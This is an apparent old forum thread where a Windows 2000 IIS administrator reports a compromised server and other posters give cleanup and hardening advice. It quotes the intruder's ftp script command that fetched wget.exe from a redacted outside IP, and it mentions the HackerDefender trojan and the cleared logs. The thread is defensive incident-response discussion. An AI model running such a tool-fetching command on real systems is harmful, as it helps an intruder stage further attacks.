Server Hacked - Assessment and Prevention

[Guest]

I have 2 Windows 2000 Server Machines running IIS, which have been
compromised. I am trying to determine to what extent and more importantly
prevent this form reoccuring.

I first noticed an issue because I received a virus alert from my Virus
scanning software on the servers indicating the following:

The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
HackerDefender.sys Trojan. The file was successfully deleted. user NT
AUTHORITY\SYSTEM

When I check the Server monitors, I found a command prompt open on the
screen, with the following:


C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
Anonymous login secceeded for (e-mail address removed)
ftp>get wget.exe
ftp>

(Note: I have replaced the hacker's IP in the message above with x's)

I checked the security log and found that the intruder has cleared the
entries from that day. I have deleted ftp.scr from the server.

How can I prevent this form reoccuring? How I can determine what, if any,
damage has been done?

 

[BM]

I have 2 Windows 2000 Server Machines running IIS, which have been
compromised. I am trying to determine to what extent and more importantly
prevent this form reoccuring.

I first noticed an issue because I received a virus alert from my Virus
scanning software on the servers indicating the following:

The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
HackerDefender.sys Trojan. The file was successfully deleted. user NT
AUTHORITY\SYSTEM

When I check the Server monitors, I found a command prompt open on the
screen, with the following:


C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
Anonymous login secceeded for (e-mail address removed)
ftp>get wget.exe
ftp>

(Note: I have replaced the hacker's IP in the message above with x's)

I checked the security log and found that the intruder has cleared the
entries from that day. I have deleted ftp.scr from the server.

How can I prevent this form reoccuring? How I can determine what, if any,
damage has been done?

check your IIS logs. Assuming they've not been deleted. Patch you machine.
Install IISLockdown. If you have any logging available, determine which
account was logged on to. Change its password

Report that IP address to abuse@ whio ever owns it

I actaully found in my IIS logs a while back, an attempted exploit to
remotely run some perl code from a website. It was on geocities . I emailed
them about it, and they removed it in two days. Which I thought was pretty
quick for a comapny of that site - though it'd have probalby run out of
bandwidth anyway

 

[Guest]

This machine was/is 100% patched.

Also, the ftp.scr script simply contained the following line:
get wget.exe

Also, on the one machine, although FTP is enabled, Allow Anonymous is not.
The other machine does not have FTP running at all.

Reformatting is not an option right now.

I've looked for the following:
- Any weird programs installed - none
- Any new directories - none
- Any weird user accounts - none
- Any weird ports connected - none

I have also since changed the local administrator password.

My assumption is that the system account was compromised. If it was, how
can I prevent someone from regaining access using this account?

 

[Danny Sanders]

Reformatting is not an option right now.

I've looked for the following:
- Any weird programs installed - none
- Any new directories - none
- Any weird user accounts - none
- Any weird ports connected - none

New files?
Renamed files?



How can you be 100 % sure they did not rename a Trojan to a system file (
note pad, word pad, defrag, maybe) that when executed will just reinstall
the Trojan and open your computer up to him again?

I would seriously reconsider this position.

My assumption is that the system account was compromised. If it was, how
can I prevent someone from regaining access using this account?

By first making sure he did not hide something on your systems that will re
activate, or reinstall itself on reboot or by you opening a program that
"suddenly" doesn't work. Or so you think. It *may* be the renamed Trojan
reinstalling itself quietly. To be 100 % sure you would have to format and
restore from a known good backup.


hth
DDS W 2k MVP MCSE

 

[Steven L Umbach]

As BM mentioned be sure to run IIS Lockdown/URLScan on your IIS servers and
run the MBSA tool to check for missing patches and other vulnerabilities. It
is also best practice to keep your IIS content on a partition separate from
the system partition. Trojans are usually installed willfully by a computer
user either through web browsing, email attachments, or installation from
infected media so be sure to review your practices for such. If the trojan
was installed by an admin a lot of damage could be done. A firewall that
manages inbound and outbound access with a default block rule can minimize
the impact of a trojan, particualry in acting as a backdoor.

There are free tools from Sysinternals such as Process Explorer, Autoruns,
TCPView, filemon, and RootkitRevealer that can help track down rouge
processes/executeables. From what you describe your server has been
compromised and the attacker had or has system or administrator access.
Being such, a clean install is the only way to make sure the system is
repaired. Todays root kits are very hard to detect and eliminate. But that
is your call and maybe you will get lucky. The links below may help. ---
Steve

http://www.microsoft.com/technet/security/default.mspx
http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml ---
RootkitRevealer and link to SysInternals.
http://www.microsoft.com/technet/security/tools/mbsahome.mspx --- MBSA
http://www.securityfocus.com/infocus/1755 --- IIS Lockdown info.

 

[Karl Levinson, mvp]

If your server was really fully patched, then I assume either a sub-optimal
configuration or a different app that wasn't patched was the problem.
Usually these compromises are done via well known issues. I recommend
these:

http://securityadmin.info/faq.asp#ftpfolder
http://securityadmin.info/faq.asp#hacked
http://securityadmin.info/faq.asp#harden